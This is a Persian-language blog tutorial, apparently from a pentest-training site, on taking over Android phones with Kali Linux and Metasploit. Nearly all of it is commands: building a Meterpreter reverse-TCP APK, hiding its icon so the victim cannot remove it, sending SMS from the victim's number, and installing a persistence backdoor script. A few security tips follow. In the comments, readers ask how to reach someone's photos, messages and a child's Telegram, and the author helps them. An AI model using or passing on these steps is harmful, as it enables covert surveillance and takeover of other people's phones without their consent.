هک اندروید با استفاده از کالی لینوکس و راه های امنیت

هک اندروید

در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس می پردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با ما همراه باشید.

هک اندروید و امنیت

توضیحات درباره هک اندروید

سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.

هک اندروید با استفاده از کالی لینوکس و راه های امنیت
آموزش هک اندروید با کالی لینوکس

متاسپلویت

متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم ؛ اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد،
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم.
 

اموزش ویدیو ای هک اندروید و امنیت 

 
  

اموزش تست نفوذ اندروید

در ابتدا با دستور زیر وارد متاسپلویت شوید

msfconsole

بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید

use android/meterpreter/reverse_tcp

حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید، دقت داشته باشید در این بخش باید ای پی سرور خود را وارد کنید در صورتی که از سرور استفاده نمی کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده است.

set LHOST 127.0.0.1

و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت 6060 را استفاده میکنیم

set LPORT 6060

حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید

generate -f raw -o PentestCore.apk

دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید

use multi/handler

و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم

set PAYLOAD android/meterpreter/reverse_tcp

مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.

هک اندروید با استفاده از کالی لینوکس و راه های امنیت

نحوه استفاده از meterpreter بعد از نفوذ

استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :

  امنیت سیستم عامل اندروید با رعایت نکات ساده اما مهم

دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .

دستور اول : hide_app_icon

با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.

دستور دوم : check_root

با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟
تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.

دستور سوم : send_sms -d number -t ” body text sms ”

دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور
با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.

نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter  کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.

ایجاد بکدور بر روی اندروید قربانی

در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :

/ cd

سپس در این مرحله باید با استفاده از دستور زیر به  مسیر sdcard وارد شوید :

cd /sdcard

سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.

upload /root/Desktop/backdoor.sh /sdcard

دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.

  بد افزار مبایل مخصوص گوشی های آسیایی

در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .

سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :

/ cd

cd /sdcard

در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :

sh lifetime.sh

در نهایت باید با استفاده از دستور reboot  یک بار سیستم عامل اندروید قربانی را reboot  کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.

آموزش امنیت و جلوگیری از هک اندروید

  • برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :
  • از انتی ویروس های اورجینال اندرویدی استفاده کنید
  • از نصب برنامه های نامعتبر و کرک شده خود داری کنید
  • با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
  • از دریافت برنامه به غیر از پلی استور خود داری کنید
  • بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
  • از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
  • دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
  • پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
هک اندروید با استفاده از کالی لینوکس و راه های امنیت

دانلود ویدیو اموزشی



 
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد 
پایدار باشید.

5/5 (3 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

۲۵۱ دیدگاه در “هک اندروید با استفاده از کالی لینوکس و راه های امنیت”

  • abbaspor900103 شهریور ۲۵, ۱۳۹۷ پاسخ

    چطور با این برنامه به عکس و فیلم های شخص دسترسی داشته باشیم

    • Nima Nani شهریور ۲۵, ۱۳۹۷ پاسخ

      بعد از گرفتن دسترسی میتوانید دستورات خود را اجرا کنید و هر کاری که نیاز دارید انجام بدین

  • MAJID آذر ۳, ۱۳۹۷ پاسخ

    عالیه

  • Gomnambash31252 آذر ۸, ۱۳۹۷ پاسخ

    ای پی که میگه منظورش چیه دقیقن؟
    و به جا ای پی میشه بهش ادرس ایمیل یا تلگرام بدم که اطلاعاتش واسم بیاد؟!

    • Nima Nani آذر ۸, ۱۳۹۷ پاسخ

      این اموزش برای ساخت پلود Apk است و تست نفوذ با استفاده از فایل Apk میباشد
      در بخش ای پی یا ip باید ip سرور برای اتصال کلاینت را وارد کنید

  • آلان آذر ۹, ۱۳۹۷ پاسخ

    سلام ببخشید من مودمم dlink DWM سیمکارت خور فلاشی هستش ولی زمانی که ایف کانفیگ رو برای \یدا کردن ایبی خودم میزنم در قسمت اول هیچ ایبی ندارم .وقتی هم تو ایرنترنت برس و جو کردم گفتند باید بورت فرواردینگ رو درست کنم و اینا ولی بازم به چیزی نرسیدم و نتوستم از متاسبلویت استفاده کنم اگه میشه راهنمایی کنید ممنون

    • Nima Nani آذر ۱۰, ۱۳۹۷ پاسخ

      بهتر است برای تست نفوذ از سرور های مجازی کالی لینوکس استفاده نمایید که امنیت بیشتری داشته باشید و نیازی به پورت فورواردینگ نداشته باشید
      در صورتی که میخواهید از طریق سیستم خود انجام دهید در بخش جستجو پورت فورواردینگ را جستجو نمایید و اموزش مورد نظر را مشاهده کنید

  • amirtaylord84 آذر ۲۲, ۱۳۹۷ پاسخ

    سلام خسته نباشید
    خوب ما بخوایم مثلا به یه گوشی متصل شیم اونوقت باید چجوری به اون گوشی که مده نظرمونه متصل شیم یعنی بدون اینکه گوشی دسته ما باشه میشه اینکارو کرد؟

    • Nima Nani آذر ۲۳, ۱۳۹۷ پاسخ

      درود تشکر
      باید فایل apk که ساخته اید را به هر طریقی در سیستم اندرویدی که میخواهید دسترسی داشته باشید نصب نمایید

  • witchhunter416 دی ۳, ۱۳۹۷ پاسخ

    اقا من بخام به اسم ام اس هاش دسترسی پیدا کنم باید چیکار کنم؟
    بعدش که اونو اجرا کرد
    چجوری بهش دسترسی پیدا کنم؟
    اس ام اسو میگم

    • Nima Nani دی ۴, ۱۳۹۷ پاسخ

      درود
      با زدن help میتوانید نحوه استفاده از متاسپلویت را مشاهده کنید درصورت امکان اموزشی جداگانه برای نحوه کارکرد متاسپلویت قرار خواهیم داد موفق باشید

  • witchhunter416 دی ۵, ۱۳۹۷ پاسخ

    سلام
    ای پی که باید بزنیمو از کجا بدونیم چیه

    • Nima Nani دی ۷, ۱۳۹۷ پاسخ

      درود
      از سرور مجازی استفاده کنید هنگام خرید ای پی به شما داده میشود و یا میتوانید ای پی خود را با دستور ifconfig مشاهده نمایید

  • علی موسوی دی ۵, ۱۳۹۷ پاسخ

    ببخشید من با vmware
    داخل لینوکس شدم رمشم بالای یک گیگ گزاشتم بازم هنگ میکنه چیکار کنم؟

    • Nima Nani دی ۷, ۱۳۹۷ پاسخ

      مقدار cpu اختصاص داده شده را بالا ببرید و مقدار رم را در سیستم عادلانه تقسیم کنید و بیشتر از منابع واقعی سیستم نزارید

  • witchhunter416 دی ۵, ۱۳۹۷ پاسخ

    من با cmd دستور ipconfig زدم دو تا ایپی زده بود یکی مال سیستم یکی مال vmware کدومو باید بزنم
    بعد این ایپی هارو باید توی مودم هم port forwarding کنم یا نیازی نیس ؟

    • Nima Nani دی ۷, ۱۳۹۷ پاسخ

      از داخل کالی لینوکس ifconfig بزنید و ای پی خود را مشاهده کنید اموزش پورت فورواردینگ هم در سایت جستجو نمایید و مشاهده کنید

  • witchhunter416 دی ۱۱, ۱۳۹۷ پاسخ

    با سلام و خسته نباشید
    میخاستم بگم که من همه کار هارو انجام دادم برنامرم رو نصب کردم و اجرا کردم
    ولی توی ترمینال چیزی نمیاد فقط مینویسه که
    started revers tcp handler on 192.168.28.131:3030
    چیکار کنم؟؟؟

    • Nima Nani دی ۱۱, ۱۳۹۷ پاسخ

      درود و تشکر
      شما مشکل در شبکه خود دارید درصورتی که از مجازی ساز ها استفاده میکنید network را بر روی NAT بگذارید و ای پی خود را درست وارد کنید و دقت داشته باشید دستگاه اندروید به شبکه داخلی یا خارجی شما متصل باشد

  • witchhunter416 دی ۱۲, ۱۳۹۷ پاسخ

    ببخشید ولی شبکه داخلی یا خارجی یعنی ب مودم من وصل باشه؟

    • Nima Nani دی ۱۳, ۱۳۹۷ پاسخ

      شبکه داخلی زمانی است که مودم شما یک شبکه NAT ایجاد کرده باشد و شما در داخل یک شبکه خانگی قرار دارید و فقط میتوانید ارتباط بین دستگاه های متصل به ان شبکه برقرار کنید
      شبکه خارجی شبکه بیرونی اینترنت است که هر زمان به اینترنت وصل باشید میتوانید به دستگاه متصل شوید و ازتباط از طریق شبکه جهانی اینترنت برقرار است

  • علی بهمن ۱۵, ۱۳۹۷ پاسخ

    سلام ببخشید من برنامه رو ساختم ولی مجبور شدم از ترمینال خارج بشم و سیستم رو خاموش کنم الان که روشن کردم هر چی میزنم exploit چیزی نمیاد لطفا راهنماییم کنید خیلی مهمه.اگه میشه بفرستید به ایمیلم جواب مشکل رو

    • Nima Nani بهمن ۱۵, ۱۳۹۷ پاسخ

      درود
      در شبکه داخلی شما با خاموش و رشن شدن سیستم ممکن است ای پی ها در هر دستگاه تغیر کند و برای ثابت بودن کلاینت باید از no ip یا سرور مجازی استفاده نمایید که اموزش ها در سایت موجود است

  • Alishh بهمن ۲۰, ۱۳۹۷ پاسخ

    دوتا مشکل دارم
    اولیش: برای ثابت بودن ایپی ، چطور میشه از noip در متاسپلویت استفاده کرد؟ ( نحوه استفاده اش برای رات های اماده رو بلدم ولی برای متاسپلویت نه، اگه میتونی ی اموزش کوتاه براش بذار)
    دومیش:برای هک در ماشین مجازی،بعد از port forwarding حتما باید فایروال سیستم هم غیرفعال بشه؟ اگه اره، تو کالی لینوکس چطور باید این کار رو کرد؟؟؟

    • Nima Nani بهمن ۲۳, ۱۳۹۷ پاسخ

      درود
      اموزش no ip در سایت قرار دارد و در صورت امکان برای متاسپلویت هم قرار خواهد گرفت

  • mehdi ghorbani بهمن ۲۵, ۱۳۹۷ پاسخ

    سلام
    لطفا به من بگید چجوری پیلود رو transportکنم رو برنامه ی سیستمی؟؟؟؟

    • Nima Nani اسفند ۲, ۱۳۹۷ پاسخ

      درود
      این موضوع مبحث جداگانه ای دارد که بزودی اموزش ان قرار میگیرد و با دنبال کردن اموزش های PentestCore میتوانید از ان مطلع شوید

  • irancell57 بهمن ۲۶, ۱۳۹۷ پاسخ

    در صورت خارج شدن دوباره چجوری میتونیم به این قسمت دسترسی داشته باشیم

    • Nima Nani بهمن ۲۶, ۱۳۹۷ پاسخ

      درود
      با هر بار وارد شدن به حساب کاربری خود میتوانید به این اموزش دسترسی داشته باشید

  • irancell57 بهمن ۲۶, ۱۳۹۷ پاسخ

    من دسترسی گرفتم لطفا دستورات عملی دسترسی به همه ی نقاط اندروید رو هم بذارید ممنون میشم

    • Nima Nani بهمن ۲۷, ۱۳۹۷ پاسخ

      درود
      مستوانید سویچ های راهنمارا مشاهده کنید
      بزودی اموزشی برای نحوه کنترل اندروید با این روش را قرار میدهیم

  • TheFugitive14 بهمن ۳۰, ۱۳۹۷ پاسخ

    سلام
    من این ارور هارو دارم لطفا راهنماییم کنید
    [-] Handler failed to bind to 192.168.1.103:443:- –
    [-] Handler failed to bind to 0.0.0.0:443:- –
    [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:443).

    • Nima Nani اسفند ۲, ۱۳۹۷ پاسخ

      درود
      مشکلی در تنظیمات وجود دارد مجدد طبق اموزش پیش بروید

  • Moelkurd09 بهمن ۳۰, ۱۳۹۷ پاسخ

    سلام . من دستور generate -t raw -f ex.apk رو میزنم
    بجای ساخت برنامه برام آپشن ها و توضیحات سویچر هارو میاره که t جزشون نیس
    باید سویچ دیگه ای رو بزنم؟
    ا

    • Nima Nani اسفند ۲, ۱۳۹۷ پاسخ

      درود
      دستورات را کپی نکنید دستی وارد کنید بدون مشکل اجرا میشوند
      احتمالا مشکل شما به دلیل کپی کردن دستورات بئده است

  • Masuodxavi92 اسفند ۳, ۱۳۹۷ پاسخ

    سلام شما برای دستیابی به تلگرام واینیستاگرام فرزندمون چه چیزیو پیشنهاد میکنید چه دوره ای رو

    • Nima Nani اسفند ۵, ۱۳۹۷ پاسخ

      درود
      در دوره اموزشی کالی لینوکس روش های کنترل موبایل به صورت کامل گفته شده میتوانید از ان استفاده کنید
      برای مشاهده دوره های اموزشی از منو به بخش دوره ها مراجعه کنید

  • علیرضا ارشد اسفند ۷, ۱۳۹۷ پاسخ

    سلام اقا من میخوام اموزش ببینم و بینهایت علاقه دارم و هیچکسو نمیشناسم اموزشم بده فقط تو سایت ها خوندم و رو گوشی تبلتم لینوکس دیپلوی رو نصب کردم همین دگه کاری بلد نیستم

    • Nima Nani اسفند ۹, ۱۳۹۷ پاسخ

      درود
      شما میتوانید در دوره های اموزشی ما شرکت کنید و از مباحث پایه تا پیشرفته اموزش ببینید

  • seyed136836 اسفند ۱۵, ۱۳۹۷ پاسخ

    سلام من دستورت رو دستی وارد میکنم در نهایت فایل رو نمیسازه
    و اپشن ها رو توضیح میده و سویچ t-بینشون نیست
    و تو دستور f- ..ا پی کی رو نوشته ساپورت نمیکنه هر چیزی هم که در توضیحاتش بود فایلشو نساخت
    اخرین نسخه کاای ۱.۲۰۱۹
    متااسپلویت ورژن ۵.۰.۲هم هست
    ممنون
    و تشکر
    و سپاس بخاطر اموزشهاتون و وقتی که برای ما گذاشتید

    • Nima Nani اسفند ۲۳, ۱۳۹۷ پاسخ

      درود
      در نسخه جدید یعنی ورژن ۵ متاسپلویت کمی بعضی از سویچ ها تغیر کرده اند
      برای انجام تست نفوذ از روش این اموزش باید از نسخه های قبل از ۵ استفاده کنید
      بزودی اموزش های دیگری با استفاده از متاسپلویت ۵ قرار خواهیم داد
      موفق باشید

  • jmd50 اسفند ۱۵, ۱۳۹۷ پاسخ

    سلام وقتتون بخیر بنده exploit رو که میزنم و بعد اون هدفم اپلیکیشن رو نصب میکنه ولی بعد از چند ثانیه دستور died میده و باید دوباره من exploit کنم و هدفم هم دوباره رو اپ کلیک کنه تا من دوباره دسترسی داشته باشم به گوشیش برای اینکه این اتفاق نیافته باید چکار کنم ممنون میشم راهنمایی کنید

    • Nima Nani اسفند ۱۸, ۱۳۹۷ پاسخ

      درود
      بله در بعضی از دستگاه ها ممکن است مشکلات به این صورت به وجود اید میتوانید پبلود های دیگر اندروید را در دستگاه مورد نظر تست کنید یا از رات ها استفاده کنید که اموزش های ان ها در سایت موجود است و با جستجو میتوانید مشاهده کنید

  • mohammadfeizy777827 اسفند ۲۲, ۱۳۹۷ پاسخ

    سلام من روی وی ام کالی دارم با اون بسازم میتونم ای پی وی پی اس مو ک ویندوز سرور روش نصبه رو بدم بعد چجوری از روی وی پی اس وصل شم ؟ یا کلا متااسپلویت رو روی ویندوز سرور روی وی پی اس نصب کنم همونجا بسازم؟

    • Nima Nani اسفند ۲۲, ۱۳۹۷ پاسخ

      درود
      بله باید ای پی سرور کجازیتونو بدید و از داخل سرور مجازی ان را کنترل کنید
      بهتره از سرور مجازی کالی لینوکس استفاده کنید اما میتوانید در ویندوز هم متاسپلویت را نصب کنید و این کار را انجام دهید
      برای تهیه سرور مجازی به سایت اول سرور مراجعه کنید
      موفق باشید

  • علی عباسی اسفند ۲۶, ۱۳۹۷ پاسخ

    سلام ببخشید من پیلود که درست میکنم فقط روی همون دستگاهی که باهاش ساختم نصب کنم کار میکنه روی مبایل دیگم نصب کردم هرچی کلیک میکنه روی ویروس هیچ اتفاقی داخل مولتی هندلر نمی افته انگار کسی روش کلیک نکرده مشکل چیه

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود احتمالا مشکل از شبکه و ip داخلی شما است باید از ای پی ثابت استفاده کنید که چند راه وجود دارد ۱- از پورت فورواردینگ و no ip استفاده کنید ۲- سرور مجازی تهیه کنید و به صورت امن و بدون دردسر از این روش استفاده کنید

  • عباس سعید۶ اسفند ۲۷, ۱۳۹۷ پاسخ

    سلام لطفا یه اموزش بزارید که ازvps چطور استفاده کنیم وقتی داخل متا اکسپلویت میکنم روی vps بایند نمیشه فقط ایپی خودشو قبول میکنه

    • Nima Nani اسفند ۲۸, ۱۳۹۷ پاسخ

      درود
      اگر سرور مجازی کالی لینوکس تهیه کرده باشید با همین دستورات میتوانید به راحتی apk را بسازید فقط کافیست در هنگام ست کردن ip , ip سرور خود را بدهید

  • علی رصا فروردین ۱, ۱۳۹۸ پاسخ

    سلام ببخشید این پورت فورواردینگ که با سایتserveo.net روی مبایل انجام میدن امن هست یا این ردیابی میشه

    • Nima Nani فروردین ۱۰, ۱۳۹۸ پاسخ

      درود
      سایت های زیادی برای این کار هستند اما به صورت کلی روش پورت فورواردینگ با استفاده از این وبسایت ها ،به راحتی ای پی اصلی شما را در اختیار میگذارد

  • sali14 فروردین ۵, ۱۳۹۸ پاسخ

    باسلام
    من یک چیزی را متوجه نشدم
    الان من در ویندوز لپ تاپم Vmware نصب کردم و روی اون Vmware کالی لینوکس نصب کردم
    حالا برای قضیه ip ثابت باید دقیقا چیکار کنم؟
    اینکه سرور مجازی بخرم و همون ip رو در کالی(که روی Vmهست) بجای ip وارد کنم کافیه؟
    یا باید پورت فورواردینگ هم بکنم؟ (اگه اره چجوری ؟؟؟)
    یا باید کلا کالی رو جای دیگه ای نصب کنم؟؟
    لطفا کامل و به زبان ساده بگید من مبتدی هستم 🙂
    ممنون

    • Nima Nani فروردین ۸, ۱۳۹۸ پاسخ

      درود
      در صورت تهیه سرور مجازی داخل همان سرور باید تمامی کار ها را انجام دهید و از داخل همان ، دستگاه مورد نظر را کنترل نمایید
      اگر میخواهید در مجازی ساز سیستم خانگی خود اینکار را انجام دهید اموزش پورت فورواردینگ و noip را در سایت جستجو و مشاهده کنید

  • اون فروردین ۱۱, ۱۳۹۸ پاسخ

    سلام بعد از دستور ساخت فایل apk فایل را نمیسازد !

    • Nima Nani فروردین ۲۰, ۱۳۹۸ پاسخ

      درود در نسخه جدید کمی تغیرات ایجاد شده است که در اموزش بزودی اضافه میکنیم یا میتوانید از سویچ help تغیرات را مشاهده کنید
      در صورتی که نتوانستید بسازید میتوانید نسخه قدیمی تر هم استفاده کنید

  • momenimahdi242 فروردین ۲۸, ۱۳۹۸ پاسخ

    ایا میشه بدون سرور کارشو انجام داد؟

    • Nima Nani فروردین ۲۸, ۱۳۹۸ پاسخ

      درود بله اما باید DNS ثابت بگیرید و پورت فورواردینگ انجام دهید

  • hamid اردیبهشت ۴, ۱۳۹۸ پاسخ

    سلام وقت بخیر.من یک vm دارم و کالی رو روی ان نصب کردم و با هات اسپات اینترنت گرفتم .exploit که میخواد نصب بشه فقط دو دستور اول میاد و دیگه اتفاقی نمیفته با این حال فایل رو روی گوشی میخواستمنصب کنم نصب نمیشد مشکل کجاست ؟؟؟؟

    • Nima Nani اردیبهشت ۱۹, ۱۳۹۸ پاسخ

      درود
      نسخه های خیلی قدیمی اندروید پشتیبانی نمیشود یا مراحلی از اموزش را به درستی انجام نداده اید مجدد برسی کنید یا ارور را ارسال کنید

  • علی اردیبهشت ۲۲, ۱۳۹۸ پاسخ

    سلام.با پایتون میشه انجام داد?

    • Nima Nani خرداد ۳, ۱۳۹۸ پاسخ

      درود
      پایتون یک زبان برنامه نویسی است که در صورتی که بلد باشید میتوانید ابزاری مشابه بنویسید به زبان پایتون و استفاده کنید

  • hojat اردیبهشت ۲۸, ۱۳۹۸ پاسخ

    سلام من دستور generate رو وارد میکنم میره تنظیمات دستور رو میاره

    • Nima Nani اردیبهشت ۳۱, ۱۳۹۸ پاسخ

      درود
      تغیراتی در سویچ های نسخه جدید ایجاد شده است که پست بروز شده و میتوانید مجدد تست کنید

  • Mr scarse تیر ۱, ۱۳۹۸ پاسخ

    سلام دوست عزیز خسته نباشید، این کد ها در متا نسخه ویندوز اجرا میشن؟

    • Nima Nani تیر ۱۹, ۱۳۹۸ پاسخ

      درود
      بله مشکلی با نسخه ویندوز ندارند

  • مهران تیر ۷, ۱۳۹۸ پاسخ

    ببخشید داداش من میخوام با ایپی پابلیک دسترسی بگیرم ولی ارور بایند شده رو میده ولی وقتی با اون یکی ایپی میزنم کار میکنه

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      ممکن است اپ را از قبل ساخته باشد و حذف نکرده باشید
      فایل را حذف کنید و با نام جدید ایجاد کنید
      ای پی را هم به صورت دستی وارد نمایید و کپی نکنید
      باز هم مشکلی داشتید ارور را ارسال کنید

  • No Name تیر ۸, ۱۳۹۸ پاسخ

    سیستم عامل لیتوکس رو مجازی نصب نمیشه کامپیوتر رم و cpu ضغیفی داره اگه به جا ویندوز نصب کنم می تونم هک امنیت انجام بدم ؟؟؟

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      شما میتوانیداز نسخه های کم حجم و سبک تر کالی لینوکس استفاده کنید
      در صورتی هم که جایگزین سیستم عامل اصلی خود کنید مشکلی وجود نخواهد داشت اما باید حداقل منابع مورد نیاز کالی لینوکس را داشته باشید

  • Omid تیر ۸, ۱۳۹۸ پاسخ

    سلام خسته نباشید
    قسمت ساخت apk مشکل دارم
    همش پیغام failed to load module دریافت میکنم ، ممنون میشم راهنماییم کنید.

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود و تشکر
      مشکل ممکن است از سمت دیتابیس متاسپلویت شما باشد
      سیستم عامل را اپدیت و ری استارت کنید

  • احمد آراسته تیر ۱۰, ۱۳۹۸ پاسخ

    سلام من چندین بار قبل از آشنایی با سایت شما این کارو بدون مشکل انجام دادم.اما جدیدا هربار امتحان میکنم مشکلی در انتهای کار دارم.
    بعد از اجرا و بعد از خط started reverse TCP …..
    این خط واسم ظاهر نمیشه و کلا کار نمیکنه و اطلاعات واسم ارسال نمیشه
    (این خط نمیاد)starting the payload handler….
    هیچکس نتونسته مشکلم رو حل کنه.شما چیزی در مورد این مشکل میدونید؟

    • Nima Nani تیر ۲۰, ۱۳۹۸ پاسخ

      درود
      احتمالا دستورات را اشتباه وارد میکنید طبق اموزش پیش بروید
      در صورتی که مشکلی وجود داشت ارور خود را ارسال کنید تا دقیق تر بتوانیم راهنمایتان کنیم

  • Venom hacker تیر ۱۶, ۱۳۹۸ پاسخ

    سلام خسته نباشید ایا برای هک تارگت باید حتما توی یک شبکه باشند یا خیر ؟؟
    ممنون از سایت خوبتون

    • Nima Nani تیر ۱۹, ۱۳۹۸ پاسخ

      درود
      خیر در صورتی که خارج از شبکه باشد باید پورت فورواردینگ انجام دهید یا ای پی ثابت به صورت مستقیم داشته باشید

  • abolfazl222 تیر ۲۳, ۱۳۹۸ پاسخ

    با سلام ممنون از اموزش خوبتوتون عالیه فقط من کالی لینکوسو نداشتم رفتم دانلودش کردم و روی فلش مموری بوت ساختم و کالی اونتوس من وقتی میخوام وارد لینکوس بشم یا باید نصبش کنم یا بصورت live برم خب به صورت live راحت نیستم میخوام نصبش کنم نمیشه به یه قسمتی میرسه میگه cd-dvd rom یه همچین چیزی و دو گزینه ی no و yes داره yes رو که میزنم از مرحله جلو تر نمیره و no رو که میزنم بر میگرده به مراحل قبل ممنون میشم کمک کنید

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود
      دوست عزیز این سوال مربوط به این اموزش نیست اموزش نصب کالی لینوکس را در سایت جستجو و مشاهده کنید و در صورت مشکل در اموزش مربوطه سوال فرمایید

  • abolfazl222 تیر ۲۴, ۱۳۹۸ پاسخ

    سلام من نمیتونم کالی رو نصب کنم و وقتی کی فایل apk درست میکنم نمیدونم چجوری وارد گوشی کنم و دستوراتی که باید برای گوشی قربانی بدم رو ندارم ممنون میشم کمک کنید

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود
      شما چنین سوال کلی را پرسیدید که امکانش نیست در این بخش بتوان توضیح داد اما اموزش های ان ها در سایت قرار دارد با کمی جستجو یتوانید به ان دسترسی پیدا کنید
      موفق باشید

  • Mos مرداد ۱۲, ۱۳۹۸ پاسخ

    سلام خسته نباشید
    من متااسپولیت یا همون اپلیکیشن رو ساختم ولی نمیدونم چه طوری اون رو از داخل کالی لینوکس به گوشی خودم یا شخص مورد نظر ارسال کنم
    اگه راهنماییم کنید ممنون میشم.

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود تشکر
      اگر از مجازی ساز استفاده می کنید کافیه ان را کپی کنید و در سیستم عاملی اصلی منتقل کنید اگر هم که به صورت نصبی دارید با فلش استفاده یا در جایی اپلود کنید

  • Mos مرداد ۱۲, ۱۳۹۸ پاسخ

    سلام چه طوری اپلیکیشن یا همون متااسپولیت رو که ساختیم از کالی لینوکس خارجش کنیم یا بفرستیمش به فرد مورد نظر؟
    ممنون میشم کمکم کنید .

  • mostafakn82 مرداد ۲۱, ۱۳۹۸ پاسخ

    سلام خسته نباشید .
    ببخشید آیا ابزار شاخته شده با این روش رو می توان در تلفن همراه تارگت مورد نظر مخفی کرد ؟؟؟
    ممنون .

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود و تشکر
      برای این کار اموزش اسپای نوت را در سایت جستجو کنید این ابزار امکان مخفی کردن فایل نصب شده را دارد

  • alijooshideh مرداد ۲۱, ۱۳۹۸ پاسخ

    سلام من برای پورت فرواردینک ای پی لینوکس رو میزنم اما ارور میده

    • Nima Nani مرداد ۲۵, ۱۳۹۸ پاسخ

      درود
